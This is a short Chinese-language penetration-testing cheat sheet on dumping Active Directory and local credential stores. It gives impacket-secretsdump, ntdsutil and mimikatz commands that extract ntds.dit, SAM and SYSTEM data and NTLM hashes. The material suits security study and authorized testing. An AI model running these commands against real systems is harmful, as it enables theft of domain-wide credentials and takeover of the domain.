Secrets dump
1. 介绍
ntds.dit 是 Active Directory(AD)数据库文件,存储了整个域的用户账户信息,包括域管理员和所有域用户的 NTLM 哈希。
需要从 C:\Windows\NTDS\ntds.dit 提取数据,并且通常需要 SYSTEM 注册表文件进行解密
一般需要有域管的权限才能导出
2. 使用
先获取必要的文件
C:\Windows\System32\config\SYSTEM #系统注册表配置 (必需)
C:\Windows\System32\config\SAM #安全账户管理器 本地账号密码
C:\Windows\System32\config\SECURITY #安全策略配置 包含系统级 DPAPI
C:\Windows\NTDS\ntds.dit # 域控数据库 (仅在DC上有)
**使用 impacket-secretsdump
impacket-secretsdump -just-dc -outputfile ntds_dump DOMAIN/Administrator@DC_IP
impacket-secretsdump -ntds ntds.dit -system system local #ntds.dit
impacket-secretsdump -sam SAM -system system local #sam
使用windows自带的ntdsutil命令
ntdsutil "ac i ntds" "ifm" "create full C:\temp" q q
使用 mimikatz
lsadump::ntds /path:C:\Windows\NTDS\ntds.dit /system:C:\Windows\System32\config\SYSTEM
导出后进行解密
impacket-secretsdump -ntds ntds.dit -system SYSTEM -outputfile hashes LOCAL
3. NTDS.dit与SAM的区别
ntds.dit是 Active Directory(AD)数据库文件,存储了整个域的用户账户信息,包括域管理员和所有域用户的 NTLM 哈希- SAM(Security Account Manager)数据库存储的是本地用户账户信息,包括本地管理员账户(不包含域账户)
